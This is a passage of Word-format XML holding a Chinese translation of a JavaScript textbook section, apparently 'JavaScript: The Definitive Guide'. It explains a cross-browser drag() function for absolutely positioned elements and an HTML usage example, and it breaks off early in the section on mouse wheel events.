        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件的元素或某些包含元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它必须是绝对定位的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它的</w:t>
      </w:r>
      <w:r>
        <w:t>style.left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>style.top</w:t>
      </w:r>
      <w:r>
        <w:t>值将随着用户的拖动而改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*event</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function drag(elementToDrag,event){//</w:t>
      </w:r>
      <w:r>
        <w:t>初始鼠标位置，转换为文档坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scroll=getScrollO</w:t>
      </w:r>
      <w:r>
        <w:t>ffsets();//</w:t>
      </w:r>
      <w:r>
        <w:t>来自其他地方的工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var startX=event.clientX+scroll.x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var startY=event.clientY+scroll.y;//</w:t>
      </w:r>
      <w:r>
        <w:t>在文档坐标下，待拖动元素的初始位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>elementToDrag</w:t>
      </w:r>
      <w:r>
        <w:t>是绝对定位的，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所以我们可以假设它的</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>就是文档的</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var origX=elementToDrag.offsetLeft;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var origY=elementToDrag.offsetTop;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件和元素左上角之间的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们将它另存为鼠标移动的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deltaX=startX-origX;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deltaY=startY-origY;//</w:t>
      </w:r>
      <w:r>
        <w:t>注册用于响应接着</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生的</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.addEventListener){//</w:t>
      </w:r>
      <w:r>
        <w:t>标准事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上注册捕获事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.addEventListener("mousemove",moveHandler,true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>docu</w:t>
      </w:r>
      <w:r>
        <w:t>ment.addEventListener("mouseup",upHandler,true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(document.attachEvent){//</w:t>
      </w:r>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型中，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>捕获事件是通过调用元素上的</w:t>
      </w:r>
      <w:r>
        <w:t>setCapture()</w:t>
      </w:r>
      <w:r>
        <w:t>捕获它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.setCapture();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.attachEvent("onmousemove",moveHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.attachEvent("onmouseup",upHandler);//</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件看待鼠标捕获的丢失</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.attachEvent("onlosecapture",upHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们处理了这个事件，不让任何其他元素看到它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.stopPropagation)event.stopPropagation();//</w:t>
      </w:r>
      <w:r>
        <w:t>标准模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else event.cancelBubble=true;//IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在阻止任何默认操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.preventDefault)event.preventDefault();//</w:t>
      </w:r>
      <w:r>
        <w:t>标准模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else event.returnValue=false;//IE/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>当元素正在被拖动时，这就是捕获</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它用于移动这个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function moveHandler(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!e)e=window.event;//IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>移动这个元素到当前鼠标位置，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过滚动条的位置和初始单击的偏移量来调整</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scroll=getScrollOf</w:t>
      </w:r>
      <w:r>
        <w:t>fsets();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.style.left=(e.clientX+scroll.x-deltaX)+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.style.top=(e.clientY+scroll.y-deltaY)+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>同时不让任何其他元素看到这个事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.stopPropagation)e.stopPropagation();//</w:t>
      </w:r>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else e.cancelBubble=true;//IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这是捕获在拖动结束时发生的最终</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function upHandler(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!e)e=window.event;//IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注销捕获事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.removeEventListener){//DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.removeEventListener("mouseup",upHandler,true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.removeEventListener("mousemove",moveHandler,true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(document.detachEv</w:t>
      </w:r>
      <w:r>
        <w:t>ent){//IE 5+</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.detachEvent("onlosecapture",upHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.detachEvent("onmouseup",upHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.detachEvent("onmousemove",moveHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elementToDrag.releaseCapture();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且不让事件进一步传播</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.stopPropagation)e.stopPropag</w:t>
      </w:r>
      <w:r>
        <w:t>ation();//</w:t>
      </w:r>
      <w:r>
        <w:t>标准模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else e.cancelBubble=true;//IE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下面的代码展示了在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>（它是示例</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t>带拖动功能的简化版）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="getScrollOffsets.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--drag()</w:t>
      </w:r>
      <w:r>
        <w:t>需要这个</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="Drag.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>drag()--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>要拖动的元素</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="position:absolute;left:</w:t>
      </w:r>
      <w:r>
        <w:t>100px;top:100px;width:250px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background-color:white;border:solid black;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>拖动整个元素，注意</w:t>
      </w:r>
      <w:r>
        <w:t>onmousedown</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="background-color:gray;border-bottom:dotted black;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:3px;font-family:sans-serif;font-weight:bold;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmousedown="drag(this.parentNode,event);"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>拖动我＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏的内容</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>可拖动元素的内容</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞这是一个测试。测试中，测试中，测试中，＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞测试＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞测试＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里的关键是内部＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>onmousedown</w:t>
      </w:r>
      <w:r>
        <w:t>属性。注意，它使用</w:t>
      </w:r>
      <w:r>
        <w:t>this.parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>指定整个容器元素将被拖动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="17_6_Shu_Biao_Gun_Lun_Shi_Jian_"/>
      <w:r>
        <w:t>17.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　鼠标滚轮事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有的现代浏览器都支持鼠标滚轮，并在用户滚动滚轮时触发事件。浏览器通常使用鼠标滚轮滚</w:t>
      </w:r>
      <w:r>
        <w:t>动或缩放文档，但可以通过取消</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件来阻止这些默认操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一些互用性问题影响滚轮事件，但编写跨平台的代码依旧可行。在写本章时，除</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>之外的所有浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>"mousewheel"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，但</w:t>
      </w:r>
      <w:r>
